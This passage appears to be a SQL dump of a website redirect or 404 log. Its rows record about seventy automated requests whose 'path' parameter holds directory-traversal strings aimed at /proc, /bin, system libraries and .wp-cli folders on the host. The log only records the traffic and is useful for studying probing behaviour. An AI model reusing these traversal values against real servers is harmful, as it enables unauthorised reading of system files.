00:00:00',301),(80146,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/../../../usr/../../proc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2F..%2F..%2F..%2Fusr%2F..%2F..%2Fproc','',1,0,'2026-06-24 18:46:10','0000-00-00 00:00:00',301),(80147,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../../groff/../python2.7/struct.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2F..%2Fgroff%2F..%2Fpython2.7%2Fstruct.py','',1,0,'2026-06-24 18:46:11','0000-00-00 00:00:00',301),(80148,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/lib-dynload/../code.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2Flib-dynload%2F..%2Fcode.py','',1,0,'2026-06-24 18:46:12','0000-00-00 00:00:00',301),(80149,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/importlib/../../cifs-utils',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fimportlib%2F..%2F..%2Fcifs-utils','',1,0,'2026-06-24 18:46:13','0000-00-00 00:00:00',301),(80150,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../python2.7/../libtalloc.so.2',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython2.7%2F..%2Flibtalloc.so.2','',1,0,'2026-06-24 18:46:14','0000-00-00 00:00:00',301),(80151,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../krb5/../python3.12/../python2.7/importlib',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fkrb5%2F..%2Fpython3.12%2F..%2Fpython2.7%2Fimportlib','',1,0,'2026-06-24 18:46:15','0000-00-00 00:00:00',301),(80152,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.6/logging/../optparse.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.6%2Flogging%2F..%2Foptparse.py','',1,0,'2026-06-24 18:46:16','0000-00-00 00:00:00',301),(80153,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/linecache.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Flinecache.py','',1,0,'2026-06-24 18:46:17','0000-00-00 00:00:00',301),(80154,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../mysqlclient/../python3.6/../sw',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython3.6%2F..%2Fsw','',1,0,'2026-06-24 18:46:18','0000-00-00 00:00:00',301),(80155,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/../asm-generic',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2F..%2Fasm-generic','',1,0,'2026-06-24 18:46:19','0000-00-00 00:00:00',301),(80156,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/cp',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fcp','',1,0,'2026-06-24 18:46:21','0000-00-00 00:00:00',301),(80157,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/device-mapper/../php/../python3.12/string.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fdevice-mapper%2F..%2Fphp%2F..%2Fpython3.12%2Fstring.py','',1,0,'2026-06-24 18:46:21','0000-00-00 00:00:00',301),(80158,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/../libpython2.7.so.1.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2Flibpython2.7.so.1.0','',1,0,'2026-06-24 18:46:22','0000-00-00 00:00:00',301),(80159,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../../dev/zero',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2F..%2Fdev%2Fzero','',1,0,'2026-06-24 18:46:22','0000-00-00 00:00:00',301),(80160,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../var/../.httprequest',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2Fvar%2F..%2F.HttpRequest','',1,0,'2026-06-24 18:46:23','0000-00-00 00:00:00',301),(80161,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/cmd.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2Fcmd.py','',1,0,'2026-06-24 18:46:23','0000-00-00 00:00:00',301),(80162,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../networkmanager/../python3.12/csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2FNetworkManager%2F..%2Fpython3.12%2Fcsv.py','',1,0,'2026-06-24 18:46:24','0000-00-00 00:00:00',301),(80163,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/../ldb',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2F..%2Fldb','',1,0,'2026-06-24 18:46:25','0000-00-00 00:00:00',301),(80164,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../pkgconfig/../python2.7/sqlite3',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fsqlite3','',1,0,'2026-06-24 18:46:26','0000-00-00 00:00:00',301),(80165,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../sa/../apache2/../python2.7/robotparser.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fsa%2F..%2Fapache2%2F..%2Fpython2.7%2Frobotparser.pyc','',1,0,'2026-06-24 18:46:27','0000-00-00 00:00:00',301),(80166,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/python3.6/logging/../queue.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fpython3.6%2Flogging%2F..%2Fqueue.py','',1,0,'2026-06-24 18:46:29','0000-00-00 00:00:00',301),(80167,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/python3.6m/./../python2.7/cstringio.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Fpython3.6m%2F.%2F..%2Fpython2.7%2FcStringIO.h','',1,0,'2026-06-24 18:46:29','0000-00-00 00:00:00',301),(80168,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../apache2/../python3.6/pathlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fapache2%2F..%2Fpython3.6%2Fpathlib.py','',1,0,'2026-06-24 18:46:30','0000-00-00 00:00:00',301),(80169,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/animate',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fanimate','',1,0,'2026-06-24 18:46:31','0000-00-00 00:00:00',301),(80170,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/sqlite3/../mailcap.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2Fmailcap.py','',1,0,'2026-06-24 18:46:31','0000-00-00 00:00:00',301),(80171,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/concurrent/../../man-db',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fconcurrent%2F..%2F..%2Fman-db','',1,0,'2026-06-24 18:46:32','0000-00-00 00:00:00',301),(80172,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../python3.12/../rpm-plugins',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fpython3.12%2F..%2Frpm-plugins','',1,0,'2026-06-24 18:46:32','0000-00-00 00:00:00',301),(80173,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/drm/../python3.6m/bytesobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fdrm%2F..%2Fpython3.6m%2Fbytesobject.h','',1,0,'2026-06-24 18:46:33','0000-00-00 00:00:00',301),(80174,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.6/ast.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.6%2Fast.py','',1,0,'2026-06-24 18:46:34','0000-00-00 00:00:00',301),(80175,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/traceback.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Ftraceback.py','',1,0,'2026-06-24 18:46:35','0000-00-00 00:00:00',301),(80176,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python2.7/_sysconfigdata.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython2.7%2F_sysconfigdata.pyc','',1,0,'2026-06-24 18:46:36','0000-00-00 00:00:00',301),(80177,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib/networkmanager/../debug/../python2.7/../exim',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib%2FNetworkManager%2F..%2Fdebug%2F..%2Fpython2.7%2F..%2Fexim','',1,0,'2026-06-24 18:46:37','0000-00-00 00:00:00',301),(80178,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python2.7/binhex.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython2.7%2Fbinhex.py','',1,0,'2026-06-24 18:46:38','0000-00-00 00:00:00',301),(80179,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/../lib64/python2.7/../python3.6/../libref_array.so.1',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.6%2F..%2Flibref_array.so.1','',1,0,'2026-06-24 18:46:39','0000-00-00 00:00:00',301),(80180,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/include/security/../gnu',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Finclude%2Fsecurity%2F..%2Fgnu','',1,0,'2026-06-24 18:46:40','0000-00-00 00:00:00',301),(80181,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../dovecot/../python3.12/sqlite3/../../ldb',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fdovecot%2F..%2Fpython3.12%2Fsqlite3%2F..%2F..%2Fldb','',1,0,'2026-06-24 18:46:41','0000-00-00 00:00:00',301),(80182,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/urlparse.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2Furlparse.py','',1,0,'2026-06-24 18:46:42','0000-00-00 00:00:00',301),(80183,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../libproxy/../python3.6/configparser.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flibproxy%2F..%2Fpython3.6%2Fconfigparser.py','',1,0,'2026-06-24 18:46:43','0000-00-00 00:00:00',301),(80184,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../.wp-cli/../.wp-cli/cache/../cache',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2F.wp-cli%2F..%2F.wp-cli%2Fcache%2F..%2Fcache','',1,0,'2026-06-24 18:46:44','0000-00-00 00:00:00',301),(80185,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/popen2.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fpopen2.pyc','',1,0,'2026-06-24 18:46:45','0000-00-00 00:00:00',301),(80186,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../krb5/../python3.12/../python2.7/genericpath.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fkrb5%2F..%2Fpython3.12%2F..%2Fpython2.7%2Fgenericpath.pyc','',1,0,'2026-06-24 18:46:46','0000-00-00 00:00:00',301),(80187,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/python3.6m/./../python2.7/bytes_methods.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Fpython3.6m%2F.%2F..%2Fpython2.7%2Fbytes_methods.h','',1,0,'2026-06-24 18:46:47','0000-00-00 00:00:00',301),(80188,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/mysqlclient/../python3.6/../python3.6/./logging',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmysqlclient%2F..%2Fpython3.6%2F..%2Fpython3.6%2F.%2Flogging','',1,0,'2026-06-24 18:46:48','0000-00-00 00:00:00',301),(80189,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/multiprocessing/../html/../argparse.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fmultiprocessing%2F..%2Fhtml%2F..%2Fargparse.py','',1,0,'2026-06-24 18:46:49','0000-00-00 00:00:00',301),(80190,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/bdb.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fbdb.pyo','',1,0,'2026-06-24 18:46:50','0000-00-00 00:00:00',301),(80191,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../mysql/../python3.12/cgitb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fmysql%2F..%2Fpython3.12%2Fcgitb.py','',1,0,'2026-06-24 18:46:51','0000-00-00 00:00:00',301),(80192,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/posixpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fposixpath.py','',1,0,'2026-06-24 18:46:52','0000-00-00 00:00:00',301),(80193,'https://3s-technologies.com.tr/tr/91534?path=/home/../proc/irq/./../../usr/../..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fproc%2Firq%2F.%2F..%2F..%2Fusr%2F..%2F..','',1,0,'2026-06-24 18:46:53','0000-00-00 00:00:00',301),(80194,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././python3.12/queue.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fpython3.12%2Fqueue.py','',1,0,'2026-06-24 18:46:54','0000-00-00 00:00:00',301),(80195,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../libproxy/../python3.12/csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flibproxy%2F..%2Fpython3.12%2Fcsv.py','',1,0,'2026-06-24 18:46:55','0000-00-00 00:00:00',301),(80196,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.wp-cli/../.wp-cli/../var/../../..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.wp-cli%2F..%2F.wp-cli%2F..%2Fvar%2F..%2F..%2F..','',1,0,'2026-06-24 18:46:56','0000-00-00 00:00:00',301),(80197,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/bytesobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2Fbytesobject.h','',1,0,'2026-06-24 18:46:57','0000-00-00 00:00:00',301),(80198,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/agentxtrap',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fagentxtrap','',1,0,'2026-06-24 18:46:58','0000-00-00 00:00:00',301),(80199,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/threading.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Fthreading.pyc','',1,0,'2026-06-24 18:46:59','0000-00-00 00:00:00',301),(80200,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/_pyio.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2F_pyio.pyc','',1,0,'2026-06-24 18:47:01','0000-00-00 00:00:00',301),(80201,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/tools/../tty.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2FTools%2F..%2Ftty.py','',1,0,'2026-06-24 18:47:01','0000-00-00 00:00:00',301),(80202,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../var/run',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fvar%2Frun','',1,0,'2026-06-24 18:47:02','0000-00-00 00:00:00',301),(80203,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../python2.7/new.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpython2.7%2Fnew.py','',1,0,'2026-06-24 18:47:02','0000-00-00 00:00:00',301),(80204,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib/realmd/../python2.7/../udev/../python3.12',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib%2Frealmd%2F..%2Fpython2.7%2F..%2Fudev%2F..%2Fpython3.12','',1,0,'2026-06-24 18:47:03','0000-00-00 00:00:00',301),(80205,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python3.6/uuid.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython3.6%2Fuuid.py','',1,0,'2026-06-24 18:47:03','0000-00-00 00:00:00',301),(80206,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/x11/../apache2/../python2.7/./../python3.6/html',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2FX11%2F..%2Fapache2%2F..%2Fpython2.7%2F.%2F..%2Fpython3.6%2Fhtml','',1,0,'2026-06-24 18:47:04','0000-00-00 00:00:00',301),(80207,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/firebird/../networkmanager/../python2.7/struct.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffirebird%2F..%2FNetworkManager%2F..%2Fpython2.7%2Fstruct.py','',1,0,'2026-06-24 18:47:05','0000-00-00 00:00:00',301),(80208,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../python3.6/test/../sqlite3/dbapi2.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2Fpython3.6%2Ftest%2F..%2Fsqlite3%2Fdbapi2.py','',1,0,'2026-06-24 18:47:06','0000-00-00 00:00:00',301),(80209,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/../lib64/lua/../python2.7/stringprep.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2F..%2Flib64%2Flua%2F..%2Fpython2.7%2Fstringprep.py','',1,0,'2026-06-24 18:47:07','0000-00-00 00:00:00',301),(80210,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../libproxy/../python2.7/stringio.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2Flibproxy%2F..%2Fpython2.7%2FStringIO.pyo','',1,0,'2026-06-24 18:47:08','0000-00-00 00:00:00',301),(80211,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../sa/../apache2/../python2.7/macpath.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fsa%2F..%2Fapache2%2F..%2Fpython2.7%2Fmacpath.pyc','',1,0,'2026-06-24 18:47:09','0000-00-00 00:00:00',301),(80212,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/pickle.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fpickle.pyc','',1,0,'2026-06-24 18:47:10','0000-00-00 00:00:00',301),(80213,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/.././sbin/../../dev/../proc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2F..%2F.%2Fsbin%2F..%2F..%2Fdev%2F..%2Fproc','',1,0,'2026-06-24 18:47:11','0000-00-00 00:00:00',301),(80214,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/__hello__.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2F__hello__.py','',1,0,'2026-06-24 18:47:12','0000-00-00 00:00:00',301),(80215,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../re_comp.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2Fre_comp.h','',1,0,'2026-06-24 18:47:13','0000-00-00 00:00:00',301),(80216,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/x11/../apache2/../python2.7/.././python3.6/html',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2FX11%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2F.%2Fpython3.6%2Fhtml','',1,0,'2026-06-24 18:47:14','0000-00-00 00:00:00',301),(80217,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../networkmanager/../python3.12/concurrent',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2FNetworkManager%2F..%2Fpython3.12%2Fconcurrent','',1,0,'2026-06-24 18:47:15','0000-00-00 00:00:00',301),(80218,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/cal',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fcal','',1,0,'2026-06-24 18:47:16','0000-00-00 00:00:00',301),(80219,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/encodings/../../python3.12/../python2.7/email',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fencodings%2F..%2F..%2Fpython3.12%2F..%2Fpython2.7%2Femail','',1,0,'2026-06-24 18:47:17','0000-00-00 